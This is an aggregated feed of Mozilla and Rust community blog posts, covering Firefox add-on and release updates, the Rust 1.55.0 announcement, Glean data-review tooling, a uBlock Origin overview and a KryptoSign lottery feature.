Add-ons / Web Extensions

WebExtensions Framework
  • Bug 1717760 (initKeyEvent on KeyboardEvent should return undefined) has regressed the ability of auto-filling input fields for some extensions in Firefox 93, this has impacted password manager extensions in recent nightly builds:
    • Bitwarden has fixed the issue on the extension side – Bug 1724925
    • 1password classic is also impacted – Bug 1725232
    • We may be putting off unshipping KeyboardEvent.initKeyEvent for the extensions content scripts as a short term fix on the Firefox side – Bug 1727024. Thanks to Masayuki and :smaug for looking into that.
  • Fixed a couple of issues with custom prefs set for the xpcshell tests (Bug 1723198, Bug 1723536), not an issue specific to the extensions tests but we identified it while investigating a backout due to an unexpected android-only failure (Bug 1722966 comment 12).
WebExtension APIs
  • Fixed an issue with restoring private tabs discarded earlier during their creation (not specifically an addon issue, but it could be mainly triggered by addons using the browser.tabs.discard API) – Bug 1727024

Fission

  • Nightly users now are at 63% with Fission enabled
  • Beta users now are at 33% with Fission enabled

Form Autofill

Lint, Docs and Workflow

Nimbus / Experiments

Password Manager

Performance

Proton/MR1

  • All of the blockers for putting most of the strings (minus menubar strings) in sentence case for en-US appears to be fixed! We’re checking around to see if there are any leftovers that we somehow missed. If you find any, please mark them as blocking this bug.

Search and Navigation

  • Daisuke fixed a regression where jar: urls were not visited from the Address Bar – Bug 1726305
  • Daisuke fixed a visual bug in the separate Search Bar where search engine buttons were sometimes cut – Bug 1722507
  • Gijs made the Address Bar “not secure” chiclet visible with most locales and added a tooltip – Bug 1724212
  • Harry fixed a regression where some results were not shown if history results were disabled in Address Bar settings – Bug 1725652
  • Mark switched the Search Service tests to use IOUtils – Bug 1726565

Screenshots

The Rust Programming Language BlogAnnouncing Rust 1.55.0

The Rust team is happy to announce a new version of Rust, 1.55.0. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, getting Rust 1.55.0 is as easy as:

rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.55.0 on GitHub.

What's in 1.55.0 stable

Cargo deduplicates compiler errors

In past releases, when running cargo test, cargo check --all-targets, or similar commands which built the same Rust crate in multiple configurations, errors and warnings could show up duplicated as the rustc's were run in parallel and both showed the same warning.

For example, in 1.54.0, output like this was common:

$ cargo +1.54.0 check --all-targets
    Checking foo v0.1.0
warning: function is never used: `foo`
 --> src/lib.rs:9:4
  |
9 | fn foo() {}
  |    ^^^
  |
  = note: `#[warn(dead_code)]` on by default

warning: 1 warning emitted

warning: function is never used: `foo`
 --> src/lib.rs:9:4
  |
9 | fn foo() {}
  |    ^^^
  |
  = note: `#[warn(dead_code)]` on by default

warning: 1 warning emitted

    Finished dev [unoptimized + debuginfo] target(s) in 0.10s

In 1.55, this behavior has been adjusted to deduplicate and print a report at the end of compilation:

$ cargo +1.55.0 check --all-targets
    Checking foo v0.1.0
warning: function is never used: `foo`
 --> src/lib.rs:9:4
  |
9 | fn foo() {}
  |    ^^^
  |
  = note: `#[warn(dead_code)]` on by default

warning: `foo` (lib) generated 1 warning
warning: `foo` (lib test) generated 1 warning (1 duplicate)
    Finished dev [unoptimized + debuginfo] target(s) in 0.84s

Faster, more correct float parsing

The standard library's implementation of float parsing has been updated to use the Eisel-Lemire algorithm, which brings both speed improvements and improved correctness. In the past, certain edge cases failed to parse, and this has now been fixed.

You can read more details on the new implementation in the pull request description.

std::io::ErrorKind variants updated

std::io::ErrorKind is a #[non_exhaustive] enum that classifies errors into portable categories, such as NotFound or WouldBlock. Rust code that has a std::io::Error can call the kind method to obtain a std::io::ErrorKind and match on that to handle a specific error.

Not all errors are categorized into ErrorKind values; some are left uncategorized and placed in a catch-all variant. In previous versions of Rust, uncategorized errors used ErrorKind::Other; however, user-created std::io::Error values also commonly used ErrorKind::Other. In 1.55, uncategorized errors now use the internal variant ErrorKind::Uncategorized, which we intend to leave hidden and never available for stable Rust code to name explicitly; this leaves ErrorKind::Other exclusively for constructing std::io::Error values that don't come from the standard library. This enforces the #[non_exhaustive] nature of ErrorKind.

Rust code should never match ErrorKind::Other and expect any particular underlying error code; only match ErrorKind::Other if you're catching a constructed std::io::Error that uses that error kind. Rust code matching on std::io::Error should always use _ for any error kinds it doesn't know about, in which case it can match the underlying error code, or report the error, or bubble it up to calling code.

We're making this change to smooth the way for introducing new ErrorKind variants in the future; those new variants will start out nightly-only, and only become stable later. This change ensures that code matching variants it doesn't know about must use a catch-all _ pattern, which will work both with ErrorKind::Uncategorized and with future nightly-only variants.

Open range patterns added

Rust 1.55 stabilized using open ranges in patterns:

match x as u32 {
      0 => println!("zero!"),
      1.. => println!("positive number!"),
}

Read more details here.

Stabilized APIs

The following methods and trait implementations were stabilized.

The following previously stable functions are now const.

Other changes

There are other changes in the Rust 1.55.0 release: check out what changed in Rust, Cargo, and Clippy.

Contributors to 1.55.0

Many people came together to create Rust 1.55.0. We couldn't have done it without all of you. Thanks!

Dedication

Anna Harren was a member of the community and contributor to Rust known for coining the term "Turbofish" to describe ::<> syntax. Anna recently passed away after living with cancer. Her contribution will forever be remembered and be part of the language, and we dedicate this release to her memory.

Hacks.Mozilla.OrgTime for a review of Firefox 92

Release time comes around so quickly! This month we have quite a few CSS updates, along with the new Object.hasOwn() static method for JavaScript.

This blog post provides merely a set of highlights; for all the details, check out the following:

CSS Updates

A couple of CSS features have moved from behind a preference and are now available by default: accent-color and size-adjust.

accent-color

The accent-color CSS property sets the color of an element’s accent. Accents appear in elements such as a checkbox or radio input. It’s default value is auto which represents a UA-chosen color, which should match the accent color of the platform. You can also specify a color value. Read more about the accent-color property here.

size-adjust

The size-adjust descriptor for @font-face takes a percentage value which acts as a multiplier for glyph outlines and metrics. Another tool in the CSS box for controlling fonts, it can help to harmonize the designs of various fonts when rendered at the same font size. Check out some examples on the size-adjust descriptor page on MDN.

And more…

Along with both of those, the break-inside property now has support for values avoid-page and avoid-column, the font-size-adjust property accepts two values and if that wasn’t enough system-ui as a generic font family name for the font-family property is now supported.

break-inside property on MDN

font-size-adjust property on MDN

font-family property on MDN

Object.hasOwn arrives

A nice addition to JavaScript is the Object.hasOwn() static method. This returns true if the specified property is a direct property of the object (even if that property’s value is null or undefined). false is returned if the specified property is inherited or not declared. Unlike the in operator, this method does not check for the specified property in the object’s prototype chain.

Object.hasOwn() is recommended over Object.hasOwnProperty() as it works for objects created using Object.create(null) and with objects that have overridden the inherited hasOwnProperty() method.

Read more about Object.hasOwn() on MDN

The post Time for a review of Firefox 92 appeared first on Mozilla Hacks - the Web developer blog.

Will Kahn-GreeneMozilla: 10 years

It's been a long while since I wrote Mozilla: 1 year review. I hit my 10-year "Moziversary" as an employee on September 6th. I was hired in a "doubling" period of Mozilla, so there are a fair number of people who are hitting 10 year anniversaries right now. It's interesting to see that even though we're all at the same company, we had different journeys here.

I started out as a Software Engineer or something like that. Then I was promoted to Senior Software Engineer and then Staff Software Engineer. Then last week, I was promoted to Senior Staff Software Engineer. My role at work over time has changed significantly. It was a weird path to get to where I am now, but that's probably a topic for another post.

I've worked on dozens of projects in a variety of capacities. Here's a handful of the ones that were interesting experiences in one way or another:

  • SUMO (support.mozilla.org): Mozilla's support site

  • Input: Mozilla's feedback site, user sentiment analysis, and Mozilla's initial experiments with Heartbeat and experiments platforms

  • MDN Web Docs: documentation, tutorials, and such for web standards

  • Mozilla Location Service: Mozilla's device location query system

  • Buildhub and Buildhub2: index for build information

  • Socorro: Mozilla's crash ingestion pipeline for collecting, processing, and analyzing crash reports for Mozilla products

  • Tecken: Mozilla's symbols server for uploading and downloading symbols and also symbolicating stacks

  • Standup: system for reporting and viewing status

  • FirefoxOS: Mozilla's mobile operating system

I also worked on a bunch of libraries and tools:

  • siggen: library for generating crash signatures using the same algorithm that Socorro uses (Python)

  • Everett: configuration library (Python)

  • Markus: metrics client library (Python)

  • Bleach: sanitizer for user-provided text for use in an HTML context (Python)

  • ElasticUtils: Elasticsearch query DSL library (Python)

  • mozilla-django-oidc: OIDC authentication for Django (Python)

  • Puente: convenience library for using gettext strings in Django (Python)

  • crashstats-tools: command line tools for accessing Socorro APIs (Python)

  • rob-bugson: Firefox addon that adds Bugzilla links to GitHub PR pages (JS)

  • paul-mclendahand: tool for combining GitHub PRs into a single branch (Python)

  • Dennis: gettext translated strings linter (Python)

I was a part of things:

I've given a few presentations 1:

1

I thought there were more, but I can't recall what they might have been.

I've left lots of FIXME notes everywhere.

I made some stickers:

/images/soloist_2017_handdrawn.thumbnail.png

"Soloists" sticker (2017)

/images/ted_sticker.thumbnail.png

"Ted maintained this" sticker (2019)

I've worked with a lot of people and created some really warm, wonderful friendships. Some have left Mozilla, but we keep in touch.

I've been to many work weeks, conferences, summits, and all hands trips.

I've gone through a few profile pictures:

/images/profile_2011.thumbnail.jpg

Me in 2011

/images/profile_2013.thumbnail.jpg

Me in 2013

/images/profile_2016.thumbnail.jpg

Me in 2016 (taken by Erik Rose in London)

/images/profile_2021.thumbnail.jpg

Me in 2021

I've built a few desks, though my pictures are pretty meagre:

/images/standing_desk_rough_sketch.thumbnail.jpg

Rough sketch of a standing desk

/images/standing_desk_1.thumbnail.jpg

Standing desk and a stool I built

/images/desk_2021.thumbnail.jpg

My current chaos of a desk

I've written lots of blog posts on status, project retrospectives, releases, initiatives, and such. Some of them are fun reads still.

It's been a long 10 years. I wonder if I'll be here for 10 more. It's possible!

This Week In RustThis Week in Rust 407

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

Sadly, we had no nominations this week. Still, in the spirit of not leaving you without some neat rust code, I give you gradient, a command line tool to extract gradients from SVG, display and manipulate them.

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

300 pull requests were merged in the last week

Rust Compiler Performance Triage

A busy week, with lots of mixed changes, though in the end only a few were deemed significant enough to report here.

Triage done by @pnkfelix. Revision range: fe379..69c4a

3 Regressions, 1 Improvements, 3 Mixed; 0 of them in rollups 57 comparisons made in total

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New RFCs

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Formlogic

OCR Labs

ChainSafe

Subspace

dcSpark

Kraken

Kollider

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

In Rust, soundness is never just a convention.

@H2CO3 on rust-users

Thanks to Riccardo D'Ambrosio for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Niko MatsakisRustacean Principles

As the web site says, Rust is a language empowering everyone to build reliable and efficient software. I think it’s precisely this feeling of empowerment that people love about Rust. As wycats put it recently to me, Rust makes it “feel like things are possible that otherwise feel out of reach”. But what exactly makes Rust feel that way? If we can describe it, then we can use that description to help us improve Rust, and to guide us as we design extensions to Rust.

Besides the language itself, Rust is also an open-source community, one that prides itself on our ability to do collaborative design. But what do we do which makes us able to work well together? If we can describe that, then we can use those descriptions to help ourselves improve, and to instruct new people on how to better work within the community.

This blog post describes a project I and others have been working on called the Rustacean principles. This project is an attempt to enumerate the (heretofore implicit) principles that govern both Rust’s design and the way our community operates. The principles are still in draft form; for the time being, they live in the nikomatsakis/rustacean-principles repository.

How the principles got started

The Rustacean Principles were suggested by Shane during a discussion about how we can grow the Rust organization while keeping it true to itself. Shane pointed out that, at AWS, mechanisms like tenets and the leadership principles are used to communicate and preserve shared values.1 The goal at AWS, as in the Rust org, is to have teams that operate independently but which still wind up “itching in the same direction”, as aturon so memorably put it.

Since that initial conversation, the principles have undergone quite some iteration. The initial effort, which I presented at the CTCFT on 2021-06-21, were quite closely modeled on AWS tenets. After a number of in-depth conversations with both joshtriplett and aturon, though, I wound up evolving the structure quite a bit to what you see today. I expect them to continue evolving, particularly the section on what it means to be a team member, which has received less attention.

Rust empowers by being…

The principles are broken into two main sections. The first describes Rust’s particular way of empowering people. This description comes in the form of a list of properties that we are shooting for:

These properties are frequently in tension with one another. Our challenge as designers is to find ways to satisfy all of these properties at once. In some cases, though, we may be forced to decide between slightly penalizing one goal or another. In that case, we tend to give the edge to those goals that come earlier in the list over those that come later. Still, while the ordering is important, it’s important to emphasize that for Rust to be successful we need to achieve all of these feelings at once.

Each of the properties has a page that describes it in more detail. The page also describes some specific mechanisms that we use to achieve this property. These mechanisms take the form of more concrete rules that we apply to Rust’s design. For example, the page for reliability discusses type safety, consider all cases, and several other mechanisms. The discussion gives concrete examples of the tradeoffs at play and some of the techniques we have used to mitigate them.

One thing: these principles are meant to describe more than just the language. For example, one example of Rust being supportive are the great error messages, and Cargo’s lock files and dependency system are geared towards making Rust feel reliable.

How to Rustacean

Rust has been an open source project since its inception, and over time we have evolved and refined the way that we operate. One key concept for Rust are the governance teams, whose members are responsible for decisions regarding Rust’s design and maintenance. We definitely have a notion of what it means “to Rustacean” – there are specific behaviors that we are looking for. But it has historically been really challenging to define them, and in turn to help people to achieve them (or to recognize when we ourselves are falling short!). The next section of this site, How to Rustacean, is a first attempt at drafting just such a list. You can think of it like a companion to the Code of Conduct: whereas the CoC describes the bare minimum expected of any Rust participant, the How to Rustacean section describes what it means to excel.

This section of the site has undergone less iteration than the “Rust empowerment” section. The idea is that each of these principles has a dedicated page that elaborates on the principle and gives examples of it in action. The example of Raising an objection about a design (from Show up) is the most developed and a good one to look at to get the idea. One interesting bit is the “goldilocks” structure2, which indicates what it means to “show up” too little but also what it means to “show up” too much.

How the principles can be used

For the principles to be a success, they need to be more than words on a website. I would like to see them become something that we actively reference all the time as we go about our work in the Rust org.

As an example, we were recently wrestling with a minor point about the semantics of closures in Rust 2021. The details aren’t that important (you can read them here, if you like), but the decision ultimately came down to a question of whether to adapt the rules so that they are smarter, but more complex. I think it would have been quite useful to refer to these principles in that discussion: ultimately, I think we chose to (slightly) favor productivity at the expense of transparency, which aligns well with the ordering on the site. Further, as I noted in my conclusion, I would personally like to see some form of explicit capture clause for closures, which would give users a way to ensure total transparency in those cases where it is most important.

The How to Rustacean section can be used in a number of ways. One thing would be cheering on examples of where someone is doing a great job: Mara’s issue celebrating all the contributions to the 2021 Edition is a great instance of paying it forward, for example, and I would love it if we had a precise vocabulary for calling that out.

Another time these principles can be used is when looking for new candidates for team membership. When considering a candidate, we can look to see whether we can give concrete examples of times they have exhibited these qualities. We can also use the principles to give feedback to people about where they need to improve. I’d like to be able to tell people who are interested in joining a Rust team, “Well, I’ve noticed you do a great job of showing up, but your designs tend to get mired in complexity. I think you should work on start somewhere.”

“Hard conversations” where you tell someone what they can do better are something that mangers do (or try to do…) in companies, but which often get sidestepped or avoided in an open source context. I don’t claim to be an expert, but I’ve found that having structure can help to take away the “sting” and make it easier for people to hear and learn from the feedback.3

What comes next

I think at this point the principles have evolved enough that it makes sense to get more widespread feedback. I’m interested in hearing from people who are active in the Rust community about whether they reflect what you love about Rust (and, if not, what might be changed). I also plan to try and use them to guide both design discussions and questions of team membership, and I encourage others in the Rust teams to do the same. If we find that they are useful, then I’d like to see them turned into an RFC and ultimately living on forge or somewhere more central.

Questions?

I’ve opened an internals thread for discussion.

Footnotes

  1. One of the first things that our team did at Amazon was to draft its own tenets; the discussion helped us to clarify what we were setting out to do and how we planned to do it. 

  2. Hat tip to Marc Brooker, who suggested the “Goldilocks” structure, based on how the Leadership Principles are presented in the AWS wiki. 

  3. Speaking of which, one glance at my queue of assigned PRs make it clear that I need to work on my follow through

Data@MozillaThis Week in Glean: Data Reviews are Important, Glean Parser makes them Easy

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All “This Week in Glean” blog posts are listed in the TWiG index).

At Mozilla we put a lot of stock in Openness. Source? Open. Bug tracker? Open. Discussion Forums (Fora?)? Open (synchronous and asynchronous).

We also have an open process for determining if a new or expanded data collection in a Mozilla project is in line with our Privacy Principles and Policies: Data Review.

Basically, when a new piece of instrumentation is put up for code review (or before, or after), the instrumentor fills out a form and asks a volunteer Data Steward to review it. If the instrumentation (as explained in the filled-in form) is obviously in line with our privacy commitments to our users, the Data Steward gives it the go-ahead to ship.

(If it isn’t _obviously_ okay then we kick it up to our Trust Team to make the decision. They sit next to Legal, in case you need to find them.)

The Data Review Process and its forms are very generic. They’re designed to work for any instrumentation (tab count, bytes transferred, theme colour) being added to any project (Firefox Desktop, mozilla.org, Focus) and being collected by any data collection system (Firefox Telemetry, Crash Reporter, Glean). This is great for the process as it means we can use it and rely on it anywhere.

It isn’t so great for users _of_ the process. If you only ever write Data Reviews for one system, you’ll find yourself answering the same questions with the same answers every time.

And Glean makes this worse (better?) by including in its metrics definitions almost every piece of information you need in order to answer the review. So now you get to write the answers first in YAML and then in English during Data Review.

But no more! Introducing glean_parser data-review and mach data-review: command-line tools that will generate for you a Data Review Request skeleton with all the easy parts filled in. It works like this:

  1. Write your instrumentation, providing full information in the metrics definition.
  2. Call python -m glean_parser data-review <bug_number> <list of metrics.yaml files> (or mach data-review <bug_number> if you’re adding the instrumentation to Firefox Desktop).
  3. glean_parser will parse the metrics definitions files, pull out only the definitions that were added or changed in <bug_number>, and then output a partially-filled-out form for you.

Here’s an example. Say I’m working on bug 1664461 and add a new piece of instrumentation to Firefox Desktop:

fog.ipc:
  replay_failures:
    type: counter
    description: |
      The number of times the ipc buffer failed to be replayed in the
      parent process.
    bugs:
      - https://bugzilla.mozilla.org/show_bug.cgi?id=1664461
    data_reviews:
      - https://bugzilla.mozilla.org/show_bug.cgi?id=1664461
    data_sensitivity:
      - technical
    notification_emails:
      - [email protected]
      - [email protected]
    expires: never

I’m sure to fill in the `bugs` field correctly (because that’s important on its own _and_ it’s what glean_parser data-review uses to find which data I added), and have categorized the data_sensitivity. I also included a helpful description. (The data_reviews field currently points at the bug I’ll attach the Data Review Request for. I’d better remember to come back before I land this code and update it to point at the specific comment…)

Then I can simply use mach data-review 1664461 and it spits out:

!! Reminder: it is your responsibility to complete and check the correctness of
!! this automatically-generated request skeleton before requesting Data
!! Collection Review. See https://wiki.mozilla.org/Data_Collection for details.

DATA REVIEW REQUEST
1. What questions will you answer with this data?

TODO: Fill this in.

2. Why does Mozilla need to answer these questions? Are there benefits for users?
   Do we need this information to address product or business requirements?

TODO: Fill this in.

3. What alternative methods did you consider to answer these questions?
   Why were they not sufficient?

TODO: Fill this in.

4. Can current instrumentation answer these questions?

TODO: Fill this in.

5. List all proposed measurements and indicate the category of data collection for each
   measurement, using the Firefox data collection categories found on the Mozilla wiki.

Measurement Name | Measurement Description | Data Collection Category | Tracking Bug
---------------- | ----------------------- | ------------------------ | ------------
fog_ipc.replay_failures | The number of times the ipc buffer failed to be replayed in the parent process.  | technical | https://bugzilla.mozilla.org/show_bug.cgi?id=1664461


6. Please provide a link to the documentation for this data collection which
   describes the ultimate data set in a public, complete, and accurate way.

This collection is Glean so is documented
[in the Glean Dictionary](https://dictionary.telemetry.mozilla.org).

7. How long will this data be collected?

This collection will be collected permanently.
**TODO: identify at least one individual here** will be responsible for the permanent collections.

8. What populations will you measure?

All channels, countries, and locales. No filters.

9. If this data collection is default on, what is the opt-out mechanism for users?

These collections are Glean. The opt-out can be found in the product's preferences.

10. Please provide a general description of how you will analyze this data.

TODO: Fill this in.

11. Where do you intend to share the results of your analysis?

TODO: Fill this in.

12. Is there a third-party tool (i.e. not Telemetry) that you
    are proposing to use for this data collection?

No.

As you can see, this Data Review Request skeleton comes partially filled out. Everything you previously had to mechanically fill out has been done for you, leaving you more time to focus on only the interesting questions like “Why do we need this?” and “How are you going to use it?”.

Also, this saves you from having to remember the URL to the Data Review Request Form Template each time you need it. We’ve got you covered.

And since this is part of Glean, this means this is already available to every project you can see here. This isn’t just a Firefox Desktop thing.

Hope this saves you some time! If you can think of other time-saving improvements we could add once to Glean so every Mozilla project can take advantage of, please tell us on Matrix.

If you’re interested in how this is implemented, glean_parser’s part of this is over here, while the mach command part is here.

:chutten

(( This is a syndicated copy of the original post. ))

Chris H-CThis Week in Glean: Data Reviews are Important, Glean Parser makes them Easy

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All “This Week in Glean” blog posts are listed in the TWiG index).

At Mozilla we put a lot of stock in Openness. Source? Open. Bug tracker? Open. Discussion Forums (Fora?)? Open (synchronous and asynchronous).

We also have an open process for determining if a new or expanded data collection in a Mozilla project is in line with our Privacy Principles and Policies: Data Review.

Basically, when a new piece of instrumentation is put up for code review (or before, or after), the instrumentor fills out a form and asks a volunteer Data Steward to review it. If the instrumentation (as explained in the filled-in form) is obviously in line with our privacy commitments to our users, the Data Steward gives it the go-ahead to ship.

(If it isn’t _obviously_ okay then we kick it up to our Trust Team to make the decision. They sit next to Legal, in case you need to find them.)

The Data Review Process and its forms are very generic. They’re designed to work for any instrumentation (tab count, bytes transferred, theme colour) being added to any project (Firefox Desktop, mozilla.org, Focus) and being collected by any data collection system (Firefox Telemetry, Crash Reporter, Glean). This is great for the process as it means we can use it and rely on it anywhere.

It isn’t so great for users _of_ the process. If you only ever write Data Reviews for one system, you’ll find yourself answering the same questions with the same answers every time.

And Glean makes this worse (better?) by including in its metrics definitions almost every piece of information you need in order to answer the review. So now you get to write the answers first in YAML and then in English during Data Review.

But no more! Introducing glean_parser data-review and mach data-review: command-line tools that will generate for you a Data Review Request skeleton with all the easy parts filled in. It works like this:

  1. Write your instrumentation, providing full information in the metrics definition.
  2. Call python -m glean_parser data-review <bug_number> <list of metrics.yaml files> (or mach data-review <bug_number> if you’re adding the instrumentation to Firefox Desktop).
  3. glean_parser will parse the metrics definitions files, pull out only the definitions that were added or changed in <bug_number>, and then output a partially-filled-out form for you.

Here’s an example. Say I’m working on bug 1664461 and add a new piece of instrumentation to Firefox Desktop:

fog.ipc:
  replay_failures:
    type: counter
    description: |
      The number of times the ipc buffer failed to be replayed in the
      parent process.
    bugs:
      - https://bugzilla.mozilla.org/show_bug.cgi?id=1664461
    data_reviews:
      - https://bugzilla.mozilla.org/show_bug.cgi?id=1664461
    data_sensitivity:
      - technical
    notification_emails:
      - [email protected]
      - [email protected]
    expires: never

I’m sure to fill in the `bugs` field correctly (because that’s important on its own _and_ it’s what glean_parser data-review uses to find which data I added), and have categorized the data_sensitivity. I also included a helpful description. (The data_reviews field currently points at the bug I’ll attach the Data Review Request for. I’d better remember to come back before I land this code and update it to point at the specific comment…)

Then I can simply use mach data-review 1664461 and it spits out:

!! Reminder: it is your responsibility to complete and check the correctness of
!! this automatically-generated request skeleton before requesting Data
!! Collection Review. See https://wiki.mozilla.org/Data_Collection for details.

DATA REVIEW REQUEST
1. What questions will you answer with this data?

TODO: Fill this in.

2. Why does Mozilla need to answer these questions? Are there benefits for users?
   Do we need this information to address product or business requirements?

TODO: Fill this in.

3. What alternative methods did you consider to answer these questions?
   Why were they not sufficient?

TODO: Fill this in.

4. Can current instrumentation answer these questions?

TODO: Fill this in.

5. List all proposed measurements and indicate the category of data collection for each
   measurement, using the Firefox data collection categories found on the Mozilla wiki.

Measurement Name | Measurement Description | Data Collection Category | Tracking Bug
---------------- | ----------------------- | ------------------------ | ------------
fog_ipc.replay_failures | The number of times the ipc buffer failed to be replayed in the parent process.  | technical | https://bugzilla.mozilla.org/show_bug.cgi?id=1664461


6. Please provide a link to the documentation for this data collection which
   describes the ultimate data set in a public, complete, and accurate way.

This collection is Glean so is documented
[in the Glean Dictionary](https://dictionary.telemetry.mozilla.org).

7. How long will this data be collected?

This collection will be collected permanently.
**TODO: identify at least one individual here** will be responsible for the permanent collections.

8. What populations will you measure?

All channels, countries, and locales. No filters.

9. If this data collection is default on, what is the opt-out mechanism for users?

These collections are Glean. The opt-out can be found in the product's preferences.

10. Please provide a general description of how you will analyze this data.

TODO: Fill this in.

11. Where do you intend to share the results of your analysis?

TODO: Fill this in.

12. Is there a third-party tool (i.e. not Telemetry) that you
    are proposing to use for this data collection?

No.

As you can see, this Data Review Request skeleton comes partially filled out. Everything you previously had to mechanically fill out has been done for you, leaving you more time to focus on only the interesting questions like “Why do we need this?” and “How are you going to use it?”.

Also, this saves you from having to remember the URL to the Data Review Request Form Template each time you need it. We’ve got you covered.

And since this is part of Glean, this means this is already available to every project you can see here. This isn’t just a Firefox Desktop thing. 

Hope this saves you some time! If you can think of other time-saving improvements we could add once to Glean so every Mozilla project can take advantage of, please tell us on Matrix.

If you’re interested in how this is implemented, glean_parser’s part of this is over here, while the mach command part is here.

:chutten

Cameron KaiserTenFourFox FPR32 SPR4 available

TenFourFox Feature Parity Release 32 Security Parity Release 4 "32.4" is available for testing (downloads, hashes). There are, as before, no changes to the release notes nor anything notable about the security patches in this release. Assuming no major problems, FPR32.4 will go live Monday evening Pacific time as usual. The final official build FPR32.5 remains scheduled for October 5, so we'll do a little look at your options should you wish to continue building from source after that point later this month.

Firefox Add-on ReviewsuBlock Origin—everything you need to know about the ad blocker

Rare is the browser extension that can satisfy both passive and power users. But that’s an essential part of uBlock Origin’s brilliance—it is an ad blocker you could recommend to your most tech forward friend as easily as you could to someone who’s just emerged from the jungle lost for the past 20 years. 

If you install uBlock Origin and do nothing else, right out of the box it will block nearly all types of internet advertising—everything from big blinking banners to search ads and video pre-rolls and all the rest. However if you want extremely granular levels of content control, uBlock Origin can accommodate via advanced settings. 

We’ll try to split the middle here and walk through a few of the extension’s most intriguing features and options…

Does using uBlock Origin actually speed up my web experience? 

Yes. Not only do web pages load faster because the extension blocks unwanted ads from loading, but uBlock Origin utilizes a uniquely lightweight approach to content filtering so it imposes minimal impact on memory consumption. It is generally accepted that uBlock Origin offers the most performative speed boost among top ad blockers. 

But don’t ad blockers also break pages? 

Occasionally that can occur, where a page breaks if certain content is blocked or some websites will even detect the presence of an ad blocker and halt passage. 

Fortunately this doesn’t happen as frequently with uBlock Origin as it might with other ad blockers and the extension is also extremely effective at bypassing anti-ad blockers (yes, an ongoing battle rages between ad tech and content blocking software). But if uBlock Origin does happen to break a page you want to access it’s easy to turn off content blocking for specific pages you trust or perhaps even want to see their ads.

<figcaption>Hit the blue on/off button if you want to suspend content blocking on any page.</figcaption>

Show us a few tips & tricks

Let’s take a look at some high level settings and what you can do with them. 

  • Lightning bolt button enables Element Zapper, which lets you temporarily remove page elements by simply mousing over them and clicking. For example, this is convenient for removing embedded gifs or for hiding disturbing images you may encounter in some news articles.
  • Eye dropper button enables Element Picker, which lets you permanently remove page elements. For example, if you find Facebook Stories a complete waste of time, just activate Element Picker, mouse over/click the Stories section of the page, select “Create” and presto—The End of Facebook Stories.    

The five buttons on this row will only affect the page you’re on.

  • Pop-up button blocks—you guessed it—pop-ups
  • Film button blocks large media elements like embedded video, audio, or images
  • Eye slash button disables cosmetic filtering, which is on by default and elegantly reformats your pages when ads are removed, but if you’d prefer to see pages laid out as they were intended (with just empty spaces instead of ads) then you have that option
  • “Aa” button blocks remote fonts from loading on the page
  • “</>” button disables JavaScript on the page

Does uBlock Origin protect against malware? 

In addition to using various advertising block lists, uBlock Origin also leverages potent lists of known malware sources, so it automatically blocks those for you as well. To be clear, there is no software that can offer 100% malware protection, but it doesn’t hurt to give yourself enhanced protections like this. 

All of the content block lists are actively maintained by volunteers who believe in the mission of providing users with more choice and control over the content they see online. “uBlock Origin stands uncompromisingly for all users’ best interests, it’s not monetized, and its development and maintenance is driven only by volunteers who share the same view,” says uBlock Origin founder and developer Raymond Hill. “As long as I am the maintainer of [uBlock Origin], this will not change.”

We could go into a lot more detail about uBlock Origin—how you can create your own custom filter lists, how you can set it to block only media of a certain size, cloud storage sync, and so on—but power users will discover these delights on their own. Hopefully we’ve provided enough insight here to help you make an informed choice about exploring uBlock Origin, whether it be your first ad blocker or just the latest. 

If you’d like to check out other amazing ad blocker options, please see What’s the best ad blocker for you?

Mark MayoCelebrating 10k KryptoSign users with an on-chain lottery feature!

TL;DR: we’re adding 3 new features to KryptoSign today!

  • CSV downloads of a document’s signers
  • Document Locking (prevent further signing)
  • Document Lotteries (pick a winner from list of signers)

Why? Well, you folks keep abusing this simple Ethereum-native document signing tool to run contests for airdrops and pre-sales, so we thought we’d make your lives a bit easier! :)

up and to the right graph showing exponential growth of KS

We launched KryptoSign in May this year as tool for Kai, Bart, and I to do the lightest possible “contract signing” using our MetaMask wallets. Write down a simple scope of work with someone, both parties sign with their wallet to signal they agree. When the job is complete, their Ethereum address is right there to copy-n-paste into a wallet to send payment. Quick, easy, delightful. :)

But as often happens, users started showing up and using it for other things. Like guestbooks. And then guestbooks became a way to sign up users for NFT drops as part of contests and pre-sales, and so on. The organizer has everyone sign a KS doc, maybe link their Discord or Twitter, and then picks a winner and sends a NFT/token/etc. to their address in the signature block. Cool.

As these NFT drops started getting really hot the feature you all wanted was pretty obvious: have folks sign a KS document as part of a pre-sales window, and have KS pick the winner automatically. Because the stakes on things like hot NFT pre-sales are high, we decided to implement the random winner using Chainlink’s VRF — verifiable random functions — which means everyone involved in a KryptoSign lottery can independently confirm how the random winner was picked. Transparency is nice!

